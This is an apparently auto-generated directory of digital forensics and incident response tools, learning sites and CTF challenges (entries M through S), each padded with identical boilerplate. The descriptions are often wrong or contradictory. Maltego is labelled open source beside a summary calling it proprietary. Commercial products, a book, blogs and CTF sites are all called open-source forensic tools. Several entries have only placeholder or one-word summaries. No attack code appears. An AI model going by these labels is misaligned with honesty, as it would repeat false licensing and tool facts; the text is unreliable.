• Source Lists: Awesome Forensics

What it does: MacLocationsScraper is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Dump the contents of the location database files on iOS and macOS.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > OS X Forensics.

Back to Name Jump

macMRUParser

• Website: https://github.com/mac4n6/macMRU-Parser
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: macMRUParser is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Python script to parse the Most Recently Used (MRU) plist files on macOS into a more human friendly format.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > OS X Forensics.

Back to Name Jump

Magnet AXIOM

• Website: https://www.magnetforensics.com/downloadaxiom
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome CTF

What it does: Magnet AXIOM is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Artifact-centric DFIR tool.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Create > Forensics.

Back to Name Jump

MagnetForensics CTF Challenge

• Website: https://www.magnetforensics.com/blog/magnet-weekly-ctf-challenge/
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: MagnetForensics CTF Challenge is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Learn Forensics > CTFs and Challenges.

Back to Name Jump

Maltego

• Website: http://www.maltego.com/
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Penetration Testing

What it does: Maltego is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Proprietary software for open sources intelligence and forensics.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Penetration Testing > Open Sources Intelligence (OSINT).

Back to Name Jump

MalwareTech Labs

• Website: https://malwaretech.com/labs/
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: MalwareTech Labs is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Learn Forensics > CTFs and Challenges.

Back to Name Jump

MEAT

• Website: https://github.com/jfarley248/MEAT
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: MEAT is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Perform different kinds of acquisitions on iOS devices.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Mobile Forensics.

Back to Name Jump

MemLabs

• Website: https://github.com/stuxnet999/MemLabs
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: MemLabs is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Learn Forensics > CTFs and Challenges.

Back to Name Jump

MemProcFS

• Website: https://github.com/ufrisk/MemProcFS
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: MemProcFS is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: An easy and convenient way of accessing physical memory as files a virtual file system.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Memory Forensics.

Back to Name Jump

MFT-Parsers

• Website: http://az4n6.blogspot.com/2015/09/whos-your-master-mft-parsers-reviewed.html
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: MFT-Parsers is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Comparison of MFT-Parsers.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Windows Artifacts > NTFS/MFT Processing.

Back to Name Jump

MFTEcmd

• Website: https://binaryforay.blogspot.com/2018/06/introducing-mftecmd.html
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: MFTEcmd is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: MFT Parser by Eric Zimmerman.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Windows Artifacts > NTFS/MFT Processing.

Back to Name Jump

MFTMactime

• Website: https://github.com/kero99/mftmactime
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: MFTMactime is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: MFT and USN parser that allows direct extraction in filesystem timeline format (mactime), dump all resident files in the MFT in their original folder structure and run yara rules over them all.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Windows Artifacts > NTFS/MFT Processing.

Back to Name Jump

mig

• Website: https://github.com/mozilla/mig
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: mig is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Distributed & real time digital forensics at the speed of the cloud.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Live Forensics.

Back to Name Jump

Letter N

This letter section contains 5 tools.

Netresec

• Website: https://www.netresec.com/index.ashx?page=Blog
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: Netresec is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Resources > Blogs.

Back to Name Jump

NTFS journal parser

• Website: http://strozfriedberg.github.io/ntfs-linker/
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: NTFS journal parser is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Windows Artifacts > NTFS/MFT Processing.

Back to Name Jump

NTFS USN Journal parser

• Website: https://github.com/PoorBillionaire/USN-Journal-Parser
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: NTFS USN Journal parser is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Windows Artifacts > NTFS/MFT Processing.

Back to Name Jump

NTFSTool

• Website: https://github.com/thewhiteninja/ntfstool
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: NTFSTool is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Complete NTFS forensics tool.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Windows Artifacts > NTFS/MFT Processing.

Back to Name Jump

NW3C Chanllenges

• Website: https://nw3.ctfd.io
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: NW3C Chanllenges is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Learn Forensics > CTFs and Challenges.

Back to Name Jump

Letter O

This letter section contains 5 tools.

OfflineRegistryView

• Website: https://www.nirsoft.net/utils/offline_registry_view.html
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome CTF

What it does: OfflineRegistryView is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Simple tool for Windows that allows you to read offline Registry files from external drive and view the desired Registry key in .reg file format.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Solve > Forensics.

Back to Name Jump

OpenBackupExtractor

• Website: https://github.com/vgmoose/OpenBackupExtractor
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: OpenBackupExtractor is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: An app for extracting data from iPhone and iPad backups.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Mobile Forensics.

Back to Name Jump

OpenRelik

• Website: https://openrelik.org/
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: OpenRelik is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Forensic platform to store file artifacts and run workflows.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Frameworks.

Back to Name Jump

osquery

• Website: https://github.com/osquery/osquery
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: osquery is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: SQL powered operating system analytics.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Live Forensics.

Back to Name Jump

OSX Collect

• Website: https://github.com/YelpArchive/osxcollector
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: OSX Collect is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > OS X Forensics.

Back to Name Jump

Letter P

This letter section contains 8 tools.

PancakeViewer

• Website: https://github.com/forensicmatt/PancakeViewer
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: PancakeViewer is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Disk image viewer based in dfvfs, similar to the FTK Imager viewer.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Disk image handling.

Back to Name Jump

PCILeech

• Website: https://github.com/ufrisk/pcileech
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Penetration Testing

What it does: PCILeech is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Uses PCIe hardware devices to read and write from the target system memory via Direct Memory Access (DMA) over PCIe.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Penetration Testing > Physical Access Tools.

Back to Name Jump

PDF Streams Inflater

• Website: http://malzilla.sourceforge.net/downloads.html
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome CTF

What it does: PDF Streams Inflater is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Find and extract zlib files compressed in PDF files.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Solve > Forensics.

Back to Name Jump

photorec

• Website: https://www.cgsecurity.org/wiki/PhotoRec
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: photorec is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: File carving tool.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Carving.

Back to Name Jump

Pngcheck

• Website: http://www.libpng.org/pub/png/apps/pngcheck.html
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome CTF

What it does: Pngcheck is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Verifies the integrity of PNG and dump all of the chunk-level information in human-readable form.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Solve > Forensics.

Back to Name Jump

Precision Widgets of North Dakota Intrusion

• Website: https://betweentwodfirns.blogspot.com/2017/11/dfir-ctf-precision-widgets-of-north.html
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: Precision Widgets of North Dakota Intrusion is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Learn Forensics > CTFs and Challenges.

Back to Name Jump

PyShadow

• Website: https://github.com/alicangnll/pyshadow
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: PyShadow is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: A library for Windows to read shadow copies, delete shadow copies, create symbolic links to shadow copies, and create shadow copies.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Windows Artifacts.

Back to Name Jump

python-ntfs

• Website: https://github.com/williballenthin/python-ntfs
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: python-ntfs is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: NTFS analysis.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Windows Artifacts > NTFS/MFT Processing.

Back to Name Jump

Letter R

This letter section contains 7 tools.

Real Digital Forensics

• Website: https://www.amzn.com/dp/0321240693
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Malware Analysis

What it does: Real Digital Forensics is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Computer.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Resources > Books.

Back to Name Jump

RecuperaBit

• Website: https://github.com/Lazza/RecuperaBit
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: RecuperaBit is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Reconstruct and recover NTFS data.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Windows Artifacts > NTFS/MFT Processing.

Back to Name Jump

Registry Dumper

• Website: http://www.kahusecurity.com/posts/registry_dumper_find_and_dump_hidden_registry_keys.html
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome CTF

What it does: Registry Dumper is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Dump your registry.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Create > Forensics.

Back to Name Jump

Registry Viewer®

• Website: https://accessdata.com/product-download/registry-viewer-2-0-0
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome CTF

What it does: Registry Viewer® is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Used to view Windows registries.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Solve > Forensics.

Back to Name Jump

RegRippy

• Website: https://github.com/airbus-cert/regrippy
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: RegRippy is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: A framework for reading and extracting useful forensics data from Windows registry hives.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Tools > Windows Artifacts.

Back to Name Jump

ResourcesExtract

• Website: http://www.nirsoft.net/utils/resources_extract.html
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome CTF

What it does: ResourcesExtract is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Extract various filetypes from exes.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Solve > Forensics.

Back to Name Jump

ReverseEngineering Challenges

• Website: https://challenges.re
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: ReverseEngineering Challenges is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Learn Forensics > CTFs and Challenges.

Back to Name Jump

Letter S

This letter section contains 11 tools.

SANS Digital Forensics

• Website: https://www.sans.org/cybersecurity-focus-areas/digital-forensics-incident-response
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: SANS Digital Forensics is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Source list entry describing this security tool and its use case.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Forensics > Resources > Web.

Back to Name Jump

SANS Investigative Forensics Toolkit (sift)

• Website: https://github.com/teamdfir/sift
• Model: Open Source
• Category: Digital Forensics & DFIR
• Source Lists: Awesome Forensics

What it does: SANS Investigative Forensics Toolkit (sift) is used in digital forensics & dfir programs to support timeline creation, disk and memory evidence analysis, and legal-quality reporting. Source summaries describe it as: Linux distribution for forensic analysis.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

